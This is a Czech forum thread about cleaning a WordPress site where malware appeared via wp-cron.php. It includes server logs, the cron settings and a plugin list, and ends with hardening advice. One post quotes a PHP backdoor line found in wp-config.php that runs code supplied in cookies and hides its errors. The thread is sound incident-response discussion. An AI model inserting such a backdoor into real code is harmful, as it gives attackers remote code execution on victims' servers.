Malware přes wp-cron.php

15. 3. 2016 15:52:33

Napsal Karolína Vyskočilová;1276689
Setkali jste se někdy s tím, že by přes wp-cron.php byl vložen do stránek soubor s malware? Dnes mi zablokovali jednu stránku, vytvořil se soubor post.php, podle hostingu, za to může wp-cron.php, ale ten je naprosto shodný se souborem v čisté WP instalaci.

Přikládám log z webového serveru:
===============================================================================================
mojedomena.cz 209.68.5.173 "-" "-" "GET /wp-cron.php HTTP/1.0" 200 255 "http://mojedomena.cz/wp-cron.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/5362 (KHTML, like Gecko) Chrome/15.0.823.0 Safari/5362" 209.68.5.173 157807
mojedomena.cz 46.4.76.214 "-" "-" "POST /post.php HTTP/1.0" 200 291 "http://mojedomena.cz/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.1)" 46.4.76.214 4532
===============================================================================================

Neměl byste pro mně někdo radu? Dokud to nevyřeším, tak mi hosting stránku nepovolí a já zatím nemůžu nic najít. Předem díky

Zkontrolujte si také soubory které cron spouští.

15. 3. 2016 15:52:33

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182890

TomasX

15. 3. 2016 16:01:10

problém je v tom, že wp-cron ti spouští ten sajrajt, který se tam dostal jinou cestou a hosting ti pouze řekl, kterou url/proces dokázal identifikovat jako strůjce. Může to být klidně nějaký plugin, který si do db zapsal svůj záznam do wp-cronu a nechal se takhle spouštět.

Rada neexistuje, buď to celé shoď na natáhni znovu od sebe z funkční verze nebo naopak zaplať/poptej někoho, kdo najde chybu, vyčistí a záplatuje, aby se stejný problém už neopakoval.

V první řadě si ale zkontroluj naistalované pluginy, jejich verze a jestli nemají aktualizace. Klidně sem můžeš hodit seznam, třeba nějaký je na tom opravdu špatně.

15. 3. 2016 16:01:10

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182889

15. 3. 2016 16:10:33

Díky oběma,

jdu to stáhnout komplet a podívat se, co všechno tam volá wp_schedule_event.

v DB pro cron je následující:

a:9:{i:1458027148;a:1:{s:32:"woocommerce_cancel_unpaid_orders";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1458027770;a:1:{s:28:"woocommerce_cleanup_sessions";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1458044540;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1458044555;a:1:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458070970;a:1:{s:30:"woocommerce_tracker_send_event";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458085327;a:2:{s:16:"itsec_purge_logs";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:20:"itsec_purge_lockouts";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458093600;a:1:{s:27:"woocommerce_scheduled_sales";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1459425600;a:1:{s:25:"woocommerce_geoip_updater";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:7:"monthly";s:4:"args";a:0:{}s:8:"interval";i:2635200;}}}s:7:"version";i:2;}

pluginy jsou tam následující:

affiliates

affiliates-woocommerce-light

better-wp-security

gravityforms

redirection

sucuri-scanner

velvet-blues-update-urls

woocommerce

woocommerce-gravityforms-product-addons

woothemes-updater

Porovnala jsem celý WP vůči čisté instalaci a nenašla jsem tam nic jinak, ale ve wp-config.php přibylo něco s cookies, což by tam imho vůbec nemělo být, ale někde se to muselo vzít...

15. 3. 2016 16:10:33

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182888

TomasX

15. 3. 2016 16:22:05

hm, očividně i tenhle jeden řádek může dělat dost velkou neplechu a dovolí spuštění cizího kódu, ještě jsem se ale s tím nesetkal, cron a pluginy vypadají v pořádku.

15. 3. 2016 16:22:05

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182887

15. 3. 2016 16:33:29

Napsal TomášX;1276710
hm, očividně i tenhle jeden řádek může dělat dost velkou neplechu a dovolí spuštění cizího kódu, ještě jsem se ale s tím nesetkal, cron a pluginy vypadají v pořádku.

Vypadá to tak, ke cronům mají přístup better-wp-security, gravity-forms, redirection, sucuri-scanner a woocommerce + samozřejmě soubory WP, které se ale neliší. Každopádně volání i akce těch cronů vypadají na první pohled naprosto Ok a neliší se vůči standardní instalaci. Zkusím jim napsat, aby to spustili. Díky za rady i za podívání!

15. 3. 2016 16:33:29

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182886

init.22

(7 hodnocení)

15. 3. 2016 16:49:27

Napsal Karolína Vyskočilová;1276700
Díky oběma,
jdu to stáhnout komplet a podívat se, co všechno tam volá wp_schedule_event.
v DB pro cron je následující:
a:9:{i:1458027148;a:1:{s:32:"woocommerce_cancel_unpaid_orders";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:2:{s:8:"schedule";b:0;s:4:"args";a:0:{}}}}i:1458027770;a:1:{s:28:"woocommerce_cleanup_sessions";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1458044540;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1458044555;a:1:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458070970;a:1:{s:30:"woocommerce_tracker_send_event";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458085327;a:2:{s:16:"itsec_purge_logs";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:20:"itsec_purge_lockouts";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1458093600;a:1:{s:27:"woocommerce_scheduled_sales";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1459425600;a:1:{s:25:"woocommerce_geoip_updater";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:7:"monthly";s:4:"args";a:0:{}s:8:"interval";i:2635200;}}}s:7:"version";i:2;}
pluginy jsou tam následující:
affiliates
affiliates-woocommerce-light
better-wp-security
gravityforms
redirection
sucuri-scanner
velvet-blues-update-urls
woocommerce
woocommerce-gravityforms-product-addons
woothemes-updater
Porovnala jsem celý WP vůči čisté instalaci a nenašla jsem tam nic jinak, ale ve wp-config.php přibylo něco s cookies, což by tam imho vůbec nemělo být, ale někde se to muselo vzít...
if (isset($_COOKIE)) @$_COOKIE($_COOKIE);

Ten kod s tim cookie vypada na backdoor, kdy si utocnik (pravdepodobne robot) vlozi v HTTP pozadavku, v kterem cron zavola, do hodnot id a user v cookies spustitelny kod a ten se s tim pozadavkem spusti. A dokonce tam maji direktivu se zavinacem, kdy v pripade chyby se ta chyba ignoruje, aby nevzniklo nejake podezreni

15. 3. 2016 16:49:27

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182885

15. 3. 2016 20:08:54

Díky, stránky zprovozněny, jenom by mne zajímalo, jak se to do toho wp-configu dostalo. Práva mám 640, přístup pouze přes SFTP, heslo máme imho brutal force neprolomitelný,uživaztelský jmeno jiný než admin.

15. 3. 2016 20:08:54

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182884

TomasX

15. 3. 2016 20:36:07

- z tvého počítače napadeného virem

- heslo mohlo uniknout posláním třeba emailem nebo uložením v čitelné podobě

- 0day zranitelností v pluginu nebo WP, podobná vrátka nemusí být zneužívání hned po otevření, ale klidně po několika týdnech, aby bylo těžší je odhalit

- kompromitací jiného projektu na serveru a špatným nastavením/zabezpečením na serveru

Mohu ale pouze odhadovat. Pomohlo by prolézt logy serveru a hledat v nich requesty, které končily 404 nebo 500, to může odhalit skenování. Často jdou ale útočící skripty najisto a na první pokus proniknou. Pokud ještě máš k dispozici poslední úpravu toho configu, hledej podezřelé chování kolem toho datumu.

Pokud máš kontrolu nad serverem, je velice vhodné nastavit pro wp-admin jiného uživatele a jen jemu povolit zápis do php souborů kvůli aktualizaci, běžný web uživatel by neměl mít právo měnit svoje php soubory. Dále je vhodné automaticky sledovat změnu php souborů a kontrolovat čas s časem aktualizace, což jde dobře zautomatizovat i přes sftp. Po tomhle incidentu doporučuji změnit heslo, pro jistotu.

15. 3. 2016 20:36:07

https://webtrh.cz/diskuse/malware-pres-wp-cron-php/#reply1182883